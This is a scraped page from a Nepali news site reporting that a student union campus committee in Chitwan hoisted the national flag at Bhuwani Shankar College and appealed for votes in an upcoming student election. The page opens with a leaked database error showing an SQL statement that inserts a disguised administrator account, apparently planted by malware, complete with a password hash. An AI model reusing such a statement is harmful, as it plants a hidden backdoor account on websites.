WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BngK8/XNMNjbB3IIgdGLreZPPDCoZf0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:11:17', '', 'admlnlx', 'admlnlx')
चितवन माघ २१ –
अनेरास्ववियु क्याम्पस कमिटि भुवानी शंकर बहुमुखी कलेजले आज(शुक्रबार) भुवानी शंकर कलेजमा नेपालको राष्ट्रिय झण्डा झण्डोत्तलन गरेको छ । राष्ट्र र राष्ट्रियताको लागि अनेरास्ववियुको राष्ट्रिय अभियान अन्तर्गत कलेजमा राष्ट्रिय झण्डा राखिएको सो क्याम्पस कमिटिका अध्यक्ष केशब रेग्मीले जानकारी दिए ।
कार्यक्रमका प्रमुख अतिथी निबर्तमान अध्यक्ष केशब कङेलले आगामी फागुन १४ गते हुने स्ववियु निर्वाचनमा राष्ट्र र राष्ट्रियताको रक्षा गर्ने अनेरास्ववियुलाई मतदान गरी विजयी गराउन आग्रह गरेका थिए । कार्यक्रममा नेकपा एमाले खैरहनी वडा नं ६ का अशोक ढकाल, तिलक मणी पाठक, बचन पुन लगायतको उपस्थिती रहेको थियो । कार्यक्रम सो क्याम्पस कमिटिका अध्यक्ष केशब रेग्मीको अध्यक्षातामा सम्पन्न भएको थियो ।